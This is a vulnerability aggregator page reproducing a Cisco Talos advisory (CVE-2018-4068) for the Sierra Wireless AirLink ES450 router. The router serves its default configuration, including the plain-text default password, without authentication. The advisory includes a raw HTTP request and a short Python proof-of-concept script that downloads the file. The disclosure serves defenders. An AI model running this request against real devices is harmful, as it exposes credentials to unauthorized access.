Lucene search
K

Sierra Wireless AirLink ES450 ACEManager Information Disclosure

🗓️ 26 Apr 2019 00:00:00Reported by Cisco TalosType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 56 Views

Sierra Wireless AirLink ES450 ACEManager Information Disclosure vulnerability affecting FW 4.9.3, allows unauthenticated HTTP request to access default configuration revealing plain text default password

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Sierra Wireless AirLink ES450 ACEManager Information Disclosure Exploit
30 Apr 201900:00
zdt
CNVD
Sierra Wireless AirLink ES450 Information Disclosure Vulnerability (CNVD-2019-13240)
28 Apr 201900:00
cnvd
CVE
CVE-2018-4068
6 May 201917:50
cve
Cvelist
CVE-2018-4068
6 May 201917:50
cvelist
EUVD
EUVD-2018-15854
7 Oct 202500:30
euvd
NVD
CVE-2018-4068
6 May 201918:29
nvd
OSV
CVE-2018-4068
6 May 201918:29
osv
Prion
Information disclosure
6 May 201918:29
prion
RedhatCVE
CVE-2018-4068
9 Jan 202611:57
redhatcve
Talos
Sierra Wireless AirLink ES450 ACEManager Information Disclosure Vulnerability
25 Apr 201900:00
talos
Rows per page
`Talos Vulnerability Report  
  
TALOS-2018-0753  
  
Sierra Wireless AirLink ES450 ACEManager Information Disclosure Vulnerability  
April 25, 2019  
  
CVE Number  
  
CVE-2018-4068  
  
Summary  
  
An exploitable information disclosure vulnerability exists in the ACEManager functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A HTTP request can result in disclosure of the default configuration for the device. An attacker can send an unauthenticated HTTP request to trigger this vulnerability.  
Tested Versions  
  
Sierra Wireless AirLink ES450 FW 4.9.3  
  
Product URLs  
  
https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/  
CVSSv3 Score  
  
5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N  
CWE  
  
CWE-200: Information Exposure  
  
Details  
  
Sierra Wireless is a wireless communications equipement designer and manufacturer. They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is a LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.  
  
ACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.  
  
The default configuration of the device is stored in a location that can be requested without any authentication. The configuration contains all of the details of a factory reset, including, but not limited to, the default password in plain text.  
  
The file is served at /defaults.xml, while on the device it is located at /www/pub/defaults.xml. The following request will attempt to download the default configuration.  
  
GET /defaults.xml HTTP/1.1  
Host: 192.168.13.31:9191  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
If-Modified-Since: Thu, 19 Apr 2018 03:41:36 GMT  
  
This vulnerability was discovered and tested using the AirLink ES450. Most likely this vulnerability also affects the AirLink GX450 product as well.  
  
Exploit Proof of Concept  
  
#!/usr/bin/env python  
#Author : Carl Hurd, Cisco Talos  
import sys  
import socket  
import time  
import requests  
  
  
def main():  
if len(sys.argv) < 3 or len(sys.argv) > 3:  
print("Usage : {} [ip address] [port] ".format(sys.argv[0]))  
sys.exit(0)  
  
ip = sys.argv[1]  
port = sys.argv[2]  
  
response = requests.get("http://"+ip+":"+port+"/defaults.xml")  
  
print(response.text)  
  
  
if __name__ == "__main__":  
main()  
  
Timeline  
  
2018-12-14 - Vendor disclosure  
2018-12-17 - Vendor acknowledged  
2019-01-08 - Discussion to review vendor's analysis of issues  
2019-03-26 - Vendor established timelines for fix/public disclosure  
2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756  
2019-04-25 - Public Release  
  
Credit  
  
Discovered by Carl Hurd of Cisco Talos.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation